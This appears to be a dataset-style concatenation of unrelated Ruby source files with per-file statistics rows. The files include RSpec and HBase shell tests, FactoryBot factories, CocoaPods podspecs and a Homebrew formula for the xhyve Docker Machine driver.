# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# This file is copied to spec/ when you run 'rails generate rspec:install'
ENV["RAILS_ENV"] ||= 'test'
require File.expand_path("../../config/environment", __FILE__)
require 'rspec/rails'
require 'capybara/rails'
require 'database_cleaner'
# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[Rails.root.join("spec/support/**/*.rb")].each {|f| require f}
RSpec.configure do |config|
# == Mock Framework
#
# If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
#
# config.mock_with :mocha
# config.mock_with :flexmock
# config.mock_with :rr
config.mock_with :rspec
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# Module found in spec/support/session_macros.rb
config.include SessionMacros
# Module found in spec/support/registration_macros.rb
config.include RegistrationMacros
# Enable use of Capybara-specific terms, like 'feature' and 'scenario' (vs. 'describe' and 'it')
config.include Capybara::DSL
end
| 68.726872 | 206 | 0.645536 |
e2e216d24b87afbdd0fd6b1e7e09f7ec97cb6198 | 442 | # frozen_string_literal: true
FactoryBot.define do
factory :incident_management_timeline_event, class: 'IncidentManagement::TimelineEvent' do
association :project
association :author, factory: :user
association :incident
association :promoted_from_note, factory: :note
occurred_at { Time.current }
note { 'timeline created' }
note_html { '<strong>timeline created</strong>' }
action { 'comment' }
end
end
| 29.466667 | 92 | 0.730769 |
182dad7e9a93429812d45b69fbcba7c45c51363f | 1,741 | Pod::Spec.new do |s|
s.name = "DLIDEKeyboard"
s.version = "1.0.0"
s.summary = "Drop-in component for adding additional keyboard keys to both iPad/iPhone keyboards."
s.homepage = "https://github.com/garnett/DLIDEKeyboard"
s.license = {
:type => 'MIT',
:text => <<-LICENSE
Copyright (c) 2011 Gowalla (http://gowalla.com/)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
LICENSE
}
s.author = { "Denis Lebedev" => "[email protected]" }
s.source = { :git => "https://github.com/garnett/DLIDEKeyboard.git", :tag => '1.0.0' }
s.platform = :ios
s.source_files = 'DLIDEKeyboard', 'DLIDEKeyboard/Classes/*.{h,m}'
s.resources = "DLIDEKeyboard/Assets/*.png"
s.requires_arc = true
end
| 47.054054 | 105 | 0.723148 |
7adb0c5133d2ac3f7c88ecc45be161961861fff3 | 661 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'xq_test_two'
s.version = '0.0.1'
s.summary = 'A new flutter plugin project.'
s.description = <<-DESC
A new flutter plugin project.
DESC
s.homepage = 'http://example.com'
s.license = { :file => '../LICENSE' }
s.author = { 'Your Company' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.ios.deployment_target = '8.0'
end
| 30.045455 | 83 | 0.544629 |
6a90d1499149f47e874ab342f0b8775e472c3912 | 5,423 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe "PATCH /api/v3/queries/:id", type: :request do
let(:user) { FactoryBot.create :admin }
let(:status) { FactoryBot.create :status }
let(:project) { FactoryBot.create :project }
def json
JSON.parse last_response.body
end
let!(:query) do
FactoryBot.create(
:global_query,
name: "A Query",
user: user,
is_public: false,
show_hierarchies: false,
display_sums: false
)
end
let(:params) do
{
name: "Dummy Query",
public: true,
showHierarchies: false,
filters: [
{
name: "Status",
_links: {
filter: {
href: "/api/v3/queries/filters/status"
},
operator: {
"href": "/api/v3/queries/operators/="
},
schema: {
"href": "/api/v3/queries/filter_instance_schemas/status"
},
values: [
{
href: "/api/v3/statuses/#{status.id}"
}
]
}
}
],
_links: {
project: {
href: "/api/v3/projects/#{project.id}"
},
columns: [
{
href: "/api/v3/queries/columns/id"
},
{
href: "/api/v3/queries/columns/subject"
},
{
href: "/api/v3/queries/columns/status"
},
{
href: "/api/v3/queries/columns/assignee"
}
],
sortBy: [
{
href: "/api/v3/queries/sort_bys/id-desc"
},
{
href: "/api/v3/queries/sort_bys/assignee-asc"
}
],
groupBy: {
href: "/api/v3/queries/group_bys/assignee"
}
}
}
end
before do
RequestStore.clear!
login_as user
end
describe "updating a query" do
before do
header "Content-Type", "application/json"
patch "/api/v3/queries/#{query.id}", params.to_json
end
it 'should return 200 (ok)' do
expect(last_response.status).to eq(200)
end
it 'should render the updated query' do
json = JSON.parse(last_response.body)
expect(json["_type"]).to eq "Query"
expect(json["name"]).to eq "Dummy Query"
end
it 'should update the query correctly' do
query = Query.first
expect(query.group_by_column.name).to eq :assigned_to
expect(query.sort_criteria).to eq [["id", "desc"], ["assigned_to", "asc"]]
expect(query.columns.map(&:name)).to eq %i[id subject status assigned_to]
expect(query.project).to eq project
expect(query.is_public).to eq true
expect(query.display_sums).to eq false
expect(query.filters.size).to eq 1
filter = query.filters.first
expect(filter.name).to eq :status_id
expect(filter.operator).to eq "="
expect(filter.values).to eq [status.id.to_s]
end
describe "with empty params" do
let(:params) { {} }
it "should not change anything" do
json = JSON.parse(last_response.body)
expect(json["_type"]).to eq "Query"
expect(json["name"]).to eq "A Query"
end
end
end
context "with invalid parameters" do
def post!
header "Content-Type", "application/json"
patch "/api/v3/queries/#{query.id}", params.to_json
end
it "yields a 422 error given an unknown project" do
params[:_links][:project][:href] = "/api/v3/projects/#{project.id}42"
post!
expect(last_response.status).to eq 422
expect(json["message"]).to eq "Project not found"
end
it "yields a 422 error given an unknown operator" do
params[:filters][0][:_links][:operator][:href] = "/api/v3/queries/operators/wut"
post!
expect(last_response.status).to eq 422
expect(json["message"]).to eq "Status Operator is not set to one of the allowed values."
end
it "yields a 422 error given an unknown filter" do
params[:filters][0][:_links][:filter][:href] = "/api/v3/queries/filters/statuz"
post!
expect(last_response.status).to eq 422
expect(json["message"]).to eq "Statuz does not exist."
end
end
end
| 27.668367 | 94 | 0.601696 |
62026b54ec203f09ec93641217eccc832a246796 | 327 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe '{{{grape-starter}}}/v1/oapi' do
subject(:swagger) do
get RSpec.current_example.metadata[:example_group][:full_description]
last_response
end
specify { expect(swagger.status).to eql 200 }
specify { expect(swagger.body).not_to be_empty }
end
| 23.357143 | 73 | 0.743119 |
794f1365c2bd4b805d5c8c3624ad70f23b7ae64b | 2,004 | class DockerMachineDriverXhyve < Formula
desc "Docker Machine driver for xhyve"
homepage "https://github.com/machine-drivers/docker-machine-driver-xhyve"
url "https://github.com/machine-drivers/docker-machine-driver-xhyve.git",
:tag => "v0.4.0",
:revision => "829c0968dac18547636f3ad6aa5ef83677f48267"
head "https://github.com/machine-drivers/docker-machine-driver-xhyve.git"
bottle do
cellar :any_skip_relocation
rebuild 1
sha256 "5c0cf9c40831d43e094ec493d9c4598019f7c9a9b3daabce0369777fa17f77aa" => :catalina
sha256 "b7e9879c8c5c734da5bd83ae00496dc26dcf8133e354662e7b6a8846bfbfc989" => :mojave
sha256 "282868271a1e504ca8643bb6507eb2f99f8f8703d64050886e00175182b35668" => :high_sierra
end
depends_on "go" => :build
depends_on "docker-machine"
def install
(buildpath/"gopath/src/github.com/zchee/docker-machine-driver-xhyve").install \
Dir["{*,.git,.gitignore,.gitmodules}"]
ENV["GOPATH"] = "#{buildpath}/gopath"
build_root = buildpath/"gopath/src/github.com/zchee/docker-machine-driver-xhyve"
build_tags = "lib9p"
cd build_root do
git_hash = `git rev-parse --short HEAD --quiet`.chomp
git_hash = "HEAD-#{git_hash}" if build.head?
go_ldflags = "-w -s -X 'github.com/zchee/docker-machine-driver-xhyve/xhyve.GitCommit=Homebrew#{git_hash}'"
ENV["GO_LDFLAGS"] = go_ldflags
ENV["GO_BUILD_TAGS"] = build_tags
system "make", "build", "CC=#{ENV.cc}"
bin.install "bin/docker-machine-driver-xhyve"
prefix.install_metafiles
end
end
def caveats
<<~EOS
This driver requires superuser privileges to access the hypervisor. To
enable, execute
sudo chown root:wheel #{opt_prefix}/bin/docker-machine-driver-xhyve
sudo chmod u+s #{opt_prefix}/bin/docker-machine-driver-xhyve
EOS
end
test do
assert_match "xhyve-memory-size",
shell_output("#{Formula["docker-machine"].bin}/docker-machine create --driver xhyve -h")
end
end
| 35.157895 | 112 | 0.709581 |
08857615e3592419762fea929ee6325b2e257cf8 | 23,958 | #
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'hbase_constants'
include HBaseConstants
module Hbase
# Constructor tests
class TableConstructorTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
end
def teardown
shutdown
end
define_test "Hbase::Table constructor should not fail for existent tables" do
assert_nothing_raised do
table('hbase:meta').close()
end
end
end
# Helper methods tests
class TableHelpersTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
# Create test table if it does not exist
@test_name = "hbase_shell_tests_table"
create_test_table(@test_name)
@test_table = table(@test_name)
end
def tearDown
@test_table.close()
shutdown
end
define_test "is_meta_table? method should return true for the meta table" do
assert(table('hbase:meta').is_meta_table?)
end
define_test "is_meta_table? method should return false for a normal table" do
assert(!@test_table.is_meta_table?)
end
#-------------------------------------------------------------------------------
define_test "get_all_columns should return columns list" do
cols = table('hbase:meta').get_all_columns
assert_kind_of(Array, cols)
assert(cols.length > 0)
end
#-------------------------------------------------------------------------------
define_test "parse_column_name should not return a qualifier for name-only column specifiers" do
col, qual = table('hbase:meta').parse_column_name('foo')
assert_not_nil(col)
assert_nil(qual)
end
define_test "parse_column_name should support and empty column qualifier" do
col, qual = table('hbase:meta').parse_column_name('foo:')
assert_not_nil(col)
assert_not_nil(qual)
end
define_test "parse_column_name should return a qualifier for family:qualifier column specifiers" do
col, qual = table('hbase:meta').parse_column_name('foo:bar')
assert_not_nil(col)
assert_not_nil(qual)
end
end
# Simple data management methods tests
class TableSimpleMethodsTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
# Create test table if it does not exist
@test_name = "hbase_shell_tests_table"
create_test_table(@test_name)
@test_table = table(@test_name)
# Insert data to perform delete operations
@test_table.put("102", "x:a", "2", 1212)
@test_table.put(103, "x:a", "3", 1214)
@test_table.put("104", "x:a", 5)
@test_table.put("104", "x:b", 6)
@test_table.put(105, "x:a", "3")
@test_table.put(105, "x:a", "4")
@test_table.put("111", "x:a", "5")
@test_table.put("111", "x:b", "6")
@test_table.put("112", "x:a", "5")
end
def teardown
@test_table.close
shutdown
end
define_test "put should work without timestamp" do
@test_table.put("123", "x:a", "1")
end
define_test "put should work with timestamp" do
@test_table.put("123", "x:a", "2", Time.now.to_i)
end
define_test "put should work with integer keys" do
@test_table.put(123, "x:a", "3")
end
define_test "put should work with integer values" do
@test_table.put("123", "x:a", 4)
end
define_test "put should work with attributes" do
@test_table.put("123", "x:a", 4, {ATTRIBUTES=>{'mykey'=>'myvalue'}})
end
#-------------------------------------------------------------------------------
define_test "delete should work with string keys" do
@test_table.delete('102', 'x:a', 1212)
res = @test_table._get_internal('102', 'x:a')
assert_nil(res)
end
define_test "delete should work with integer keys" do
res = @test_table._get_internal('103', 'x:a')
assert_not_nil(res)
@test_table.delete(103, 'x:a', 1214)
res = @test_table._get_internal('103', 'x:a')
assert_nil(res)
end
#-------------------------------------------------------------------------------
define_test "deleteall should work w/o columns and timestamps" do
@test_table.deleteall("104")
res = @test_table._get_internal('104', 'x:a', 'x:b')
assert_nil(res)
end
define_test "deleteall should work with integer keys" do
@test_table.deleteall(105)
res = @test_table._get_internal('105', 'x:a')
assert_nil(res)
end
define_test "deletall should work with row prefix" do
@test_table.deleteall({ROWPREFIXFILTER => '11'})
res1 = @test_table._get_internal('111')
assert_nil(res1)
res2 = @test_table._get_internal('112')
assert_nil(res2)
end
define_test "append should work with value" do
@test_table.append("123", 'x:cnt2', '123')
assert_equal("123123", @test_table._append_internal("123", 'x:cnt2', '123'))
end
#-------------------------------------------------------------------------------
define_test "get_counter should work with integer keys" do
@test_table.incr(12345, 'x:cnt')
assert_kind_of(Fixnum, @test_table._get_counter_internal(12345, 'x:cnt'))
end
define_test "get_counter should return nil for non-existent counters" do
assert_nil(@test_table._get_counter_internal(12345, 'x:qqqq'))
end
end
# Complex data management methods tests
# rubocop:disable Metrics/ClassLength
class TableComplexMethodsTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
# Create test table if it does not exist
@test_name = "hbase_shell_tests_table"
create_test_table(@test_name)
@test_table = table(@test_name)
# Instert test data
@test_ts = 12345678
@test_table.put(1, "x:a", 1)
@test_table.put(1, "x:b", 2, @test_ts)
@test_table.put(2, "x:a", 11)
@test_table.put(2, "x:b", 12, @test_ts)
@test_table.put(3, "x:a", 21, {ATTRIBUTES=>{'mykey'=>'myvalue'}})
@test_table.put(3, "x:b", 22, @test_ts, {ATTRIBUTES=>{'mykey'=>'myvalue'}})
end
def teardown
@test_table.close
shutdown
end
define_test "count should work w/o a block passed" do
assert(@test_table._count_internal > 0)
end
define_test "count should work with a block passed (and yield)" do
rows = []
cnt = @test_table._count_internal(1) do |cnt, row|
rows << row
end
assert(cnt > 0)
assert(!rows.empty?)
end
define_test "count should support STARTROW parameter" do
count = @test_table.count STARTROW => '4'
assert(count == 0)
end
define_test "count should support STOPROW parameter" do
count = @test_table.count STOPROW => '0'
assert(count == 0)
end
define_test "count should support COLUMNS parameter" do
@test_table.put(4, "x:c", "31")
begin
count = @test_table.count COLUMNS => [ 'x:c']
assert(count == 1)
ensure
@test_table.deleteall(4, 'x:c')
end
end
define_test "count should support FILTER parameter" do
count = @test_table.count FILTER => "ValueFilter(=, 'binary:11')"
assert(count == 1)
end
#-------------------------------------------------------------------------------
define_test "get should work w/o columns specification" do
res = @test_table._get_internal('1')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work for data written with Attributes" do
res = @test_table._get_internal('3')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with integer keys" do
res = @test_table._get_internal(1)
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and a single string COLUMN parameter" do
res = @test_table._get_internal('1', COLUMN => 'x:a')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_nil(res['x:b'])
end
define_test "get should work with hash columns spec and a single string COLUMNS parameter" do
res = @test_table._get_internal('1', COLUMNS => 'x:a')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_nil(res['x:b'])
end
define_test "get should work with hash columns spec and an array of strings COLUMN parameter" do
res = @test_table._get_internal('1', COLUMN => [ 'x:a', 'x:b' ])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and an array of strings COLUMNS parameter" do
res = @test_table._get_internal('1', COLUMNS => [ 'x:a', 'x:b' ])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and an array of strings COLUMNS parameter with AUTHORIZATIONS" do
res = @test_table._get_internal('1', COLUMNS => [ 'x:a', 'x:b' ], AUTHORIZATIONS=>['PRIVATE'])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and TIMESTAMP only" do
res = @test_table._get_internal('1', TIMESTAMP => @test_ts)
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test 'get should work with hash columns spec and TIMESTAMP and' \
' AUTHORIZATIONS' do
res = @test_table._get_internal('1', TIMESTAMP => 1234, AUTHORIZATIONS=>['PRIVATE'])
assert_nil(res)
end
define_test "get should fail with hash columns spec and strange COLUMN value" do
assert_raise(ArgumentError) do
@test_table._get_internal('1', COLUMN => {})
end
end
define_test "get should fail with hash columns spec and strange COLUMNS value" do
assert_raise(ArgumentError) do
@test_table._get_internal('1', COLUMN => {})
end
end
define_test "get should fail with hash columns spec and no TIMESTAMP or COLUMN[S]" do
assert_raise(ArgumentError) do
@test_table._get_internal('1', { :foo => :bar })
end
end
define_test "get should work with a string column spec" do
res = @test_table._get_internal('1', 'x:b')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with an array columns spec" do
res = @test_table._get_internal('1', 'x:a', 'x:b')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with an array or arrays columns spec (yeah, crazy)" do
res = @test_table._get_internal('1', ['x:a'], ['x:b'])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get with a block should yield (column, value) pairs" do
res = {}
@test_table._get_internal('1') { |col, val| res[col] = val }
assert_equal(res.keys.sort, [ 'x:a', 'x:b' ])
end
define_test "get should support COLUMNS with value CONVERTER information" do
@test_table.put(1, "x:c", [1024].pack('N'))
@test_table.put(1, "x:d", [98].pack('N'))
begin
res = @test_table._get_internal('1', ['x:c:toInt'], ['x:d:c(org.apache.hadoop.hbase.util.Bytes).toInt'])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(/value=1024/.match(res['x:c']))
assert_not_nil(/value=98/.match(res['x:d']))
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:c')
@test_table.deleteall(1, 'x:d')
end
end
define_test "get should support FILTER" do
@test_table.put(1, "x:v", "thisvalue")
begin
res = @test_table._get_internal('1', FILTER => "ValueFilter(=, 'binary:thisvalue')")
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:v'])
assert_nil(res['x:a'])
res = @test_table._get_internal('1', FILTER => "ValueFilter(=, 'binary:thatvalue')")
assert_nil(res)
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:v')
end
end
#-------------------------------------------------------------------------------
define_test "scan should work w/o any params" do
res = @test_table._scan_internal
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support STARTROW parameter" do
res = @test_table._scan_internal STARTROW => '2'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['1'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support STOPROW parameter" do
res = @test_table._scan_internal STOPROW => '2'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_nil(res['2'])
end
define_test "scan should support ROWPREFIXFILTER parameter (test 1)" do
res = @test_table._scan_internal ROWPREFIXFILTER => '1'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_nil(res['2'])
end
define_test "scan should support ROWPREFIXFILTER parameter (test 2)" do
res = @test_table._scan_internal ROWPREFIXFILTER => '2'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['1'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support LIMIT parameter" do
res = @test_table._scan_internal LIMIT => 1
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_nil(res['2'])
end
define_test "scan should support REVERSED parameter" do
res = @test_table._scan_internal REVERSED => true
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support TIMESTAMP parameter" do
res = @test_table._scan_internal TIMESTAMP => @test_ts
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support TIMERANGE parameter" do
res = @test_table._scan_internal TIMERANGE => [0, 1]
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['1'])
assert_nil(res['2'])
end
define_test "scan should support COLUMNS parameter with an array of columns" do
res = @test_table._scan_internal COLUMNS => [ 'x:a', 'x:b' ]
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support COLUMNS parameter with a single column name" do
res = @test_table._scan_internal COLUMNS => 'x:a'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_nil(res['2']['x:b'])
end
define_test "scan should work with raw and version parameter" do
# Create test table if it does not exist
@test_name_raw = "hbase_shell_tests_raw_scan"
create_test_table(@test_name_raw)
@test_table = table(@test_name_raw)
# Instert test data
@test_table.put(1, "x:a", 1)
@test_table.put(2, "x:raw1", 11)
@test_table.put(2, "x:raw1", 11)
@test_table.put(2, "x:raw1", 11)
@test_table.put(2, "x:raw1", 11)
args = {}
num_rows = 0
@test_table._scan_internal(args) do # Normal Scan
num_rows += 1
end
assert_equal(num_rows, 2,
'Num rows scanned without RAW/VERSIONS are not 2')
args = { VERSIONS => 10, RAW => true } # Since 4 versions of row with rowkey 2 is been added, we can use any number >= 4 for VERSIONS to scan all 4 versions.
num_rows = 0
@test_table._scan_internal(args) do # Raw Scan
num_rows += 1
end
# 5 since , 1 from row key '1' and other 4 from row key '4'
assert_equal(num_rows, 5,
'Num rows scanned without RAW/VERSIONS are not 5')
@test_table.delete(1, 'x:a')
args = {}
num_rows = 0
@test_table._scan_internal(args) do # Normal Scan
num_rows += 1
end
assert_equal(num_rows, 1,
'Num rows scanned without RAW/VERSIONS are not 1')
args = { VERSIONS => 10, RAW => true }
num_rows = 0
@test_table._scan_internal(args) do # Raw Scan
num_rows += 1
end
# 6 since , 2 from row key '1' and other 4 from row key '4'
assert_equal(num_rows, 6,
'Num rows scanned without RAW/VERSIONS are not 5')
end
define_test "scan should fail on invalid COLUMNS parameter types" do
assert_raise(ArgumentError) do
@test_table._scan_internal COLUMNS => {}
end
end
define_test "scan should fail on non-hash params" do
assert_raise(ArgumentError) do
@test_table._scan_internal 123
end
end
define_test "scan with a block should yield rows and return rows counter" do
rows = {}
res = @test_table._scan_internal { |row, cells| rows[row] = cells }
assert_equal([rows.keys.size,false], res)
end
define_test "scan should support COLUMNS with value CONVERTER information" do
@test_table.put(1, "x:c", [1024].pack('N'))
@test_table.put(1, "x:d", [98].pack('N'))
begin
res = @test_table._scan_internal COLUMNS => ['x:c:toInt', 'x:d:c(org.apache.hadoop.hbase.util.Bytes).toInt']
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(/value=1024/.match(res['1']['x:c']))
assert_not_nil(/value=98/.match(res['1']['x:d']))
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:c')
@test_table.deleteall(1, 'x:d')
end
end
define_test "scan should support FILTER" do
@test_table.put(1, "x:v", "thisvalue")
begin
res = @test_table._scan_internal FILTER => "ValueFilter(=, 'binary:thisvalue')"
assert_not_equal(res, {}, "Result is empty")
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:v'])
assert_nil(res['1']['x:a'])
assert_nil(res['2'])
res = @test_table._scan_internal FILTER => "ValueFilter(=, 'binary:thatvalue')"
assert_equal(res, {}, "Result is not empty")
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:v')
end
end
define_test "scan should support FILTER with non-ASCII bytes" do
@test_table.put(4, "x:a", "\x82")
begin
res = @test_table._scan_internal FILTER => "SingleColumnValueFilter('x', 'a', >=, 'binary:\x82', true, true)"
assert_not_equal(res, {}, "Result is empty")
assert_kind_of(Hash, res)
assert_not_nil(res['4'])
assert_not_nil(res['4']['x:a'])
assert_nil(res['1'])
assert_nil(res['2'])
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(4, 'x:a')
end
end
define_test "scan hbase meta table" do
res = table("hbase:meta")._scan_internal
assert_not_nil(res)
end
define_test "mutation with TTL should expire" do
@test_table.put('ttlTest', 'x:a', 'foo', { TTL => 1000 } )
begin
res = @test_table._get_internal('ttlTest', 'x:a')
assert_not_nil(res)
sleep 2
res = @test_table._get_internal('ttlTest', 'x:a')
assert_nil(res)
ensure
@test_table.deleteall('ttlTest', 'x:a')
end
end
define_test "Split count for a table" do
@testTableName = "tableWithSplits"
create_test_table_with_splits(@testTableName, SPLITS => ['10', '20', '30', '40'])
@table = table(@testTableName)
splits = @table._get_splits_internal()
#Total splits is 5 but here count is 4 as we ignore implicit empty split.
assert_equal(4, splits.size)
assert_equal(["10", "20", "30", "40"], splits)
drop_test_table(@testTableName)
end
define_test "Split count for a empty table" do
splits = @test_table._get_splits_internal()
#Empty split should not be part of this array.
assert_equal(0, splits.size)
assert_equal([], splits)
end
define_test 'Split count for a table with region replicas' do
@test_table_name = 'tableWithRegionReplicas'
create_test_table_with_region_replicas(@test_table_name, 3,
SPLITS => ['10'])
@table = table(@test_table_name)
splits = @table._get_splits_internal
# In this case, total splits should be 1 even if the number of region
# replicas is 3.
assert_equal(1, splits.size)
assert_equal(['10'], splits)
drop_test_table(@test_table_name)
end
define_test "scan should throw an exception on a disabled table" do
@test_table.disable
begin
assert_raise(RuntimeError) do
@test_table.scan
end
ensure
@test_table.enable
end
end
end
# rubocop:enable Metrics/ClassLength
end
| 32.954608 | 163 | 0.613532 |
111ddfc23601f8ab5e709292b955050b5e1eac3b | 719 | require 'pp'
module MeanTest
def self.mean_distances(ps_block)
#ps_block = {
# keys: ["beta", "H"],
# ps: [
# {v: [0.2, -1.0], result: [-0.483285, -0.484342, -0.483428]},
# ...
# ],
# }
mean_distance = []
ps_block[:keys].each_with_index do |key, index|
mean = {}
ps_block[:ps].each do |ps|
mean[ps[:v][index]] ||= []
mean[ps[:v][index]] += ps[:result]
end
means = []
mean.each_pair do |v_val, results|
means << results.inject(:+) / results.size
end
mean_distance << (means.max - means.min)
end
mean_distance
end
end
| 23.193548 | 84 | 0.452017 |
